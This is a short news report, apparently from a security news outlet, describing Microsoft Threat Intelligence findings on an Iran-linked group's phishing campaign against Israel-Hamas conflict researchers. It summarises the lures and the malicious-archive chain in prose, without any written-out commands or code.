Iran-linked threat actors are targeting high-profile researchers working on the Israel-Hamas conflict via a sophisticated social engineering campaign, according to Microsoft Threat Intelligence.
The threat actor Mint Sandstorm (AKA APT35 and Charming Kitten), which has ties to Iranian military intelligence, is using bespoke phishing lures to entice targets into downloading malicious files, with the aim of stealing sensitive data.
The ongoing campaign, which was first spotted in November 2023, is targeting experts deemed to have the potential to influence intelligence and policies in areas of interest to the Islamic Republic of Iran.
Microsoft believe this campaign could be designed to gather different perspectives on the Israel-Hamas conflict from individuals across the ideological spectrum.
The targets primarily work at universities and research organizations in Belgium, France, Gaza, Israel, the UK and US.
How Mint Sandstorm is Targeting Middle East Experts
Microsoft said it has observed new tactics, techniques and procedures (TTP) being utilized by Mint Sandstorm in this campaign, including the use of legitimate but compromised email accounts to send phishing lures.
Initially, the threat actor emails the target pretending to be a high-profile individual, such as a journalist at a reputable news outlet requesting input for an article about the Israel-Hamas war.
In some cases, the email address used to send the message is spoofed to resemble a personal email account of the individual they are spoofing.
In others, legitimate but compromised email accounts belonging to the impersonated individual are used.
The first message is benign and contains no malicious content, with the aim of building trust with the victim, according to Microsoft’s Threat Intelligence Team. The use of legitimate email accounts likely bolsters Mint Sandstorm’s credibility.
If the target agrees to review an article or document referenced in the initial email, the Iran-linked attackers follow up with an email containing a link to a malicious domain.
These domains host a RAR archive file purporting to contain the draft document. Once opened, the .rar. decompresses into a double extension file with the same name.
When this file is opened, it runs a curl command to retrieve a series of malicious files from subdomains owned by Mint Sandstorm, glitch[.]me and supabase[.]co.
No tags.
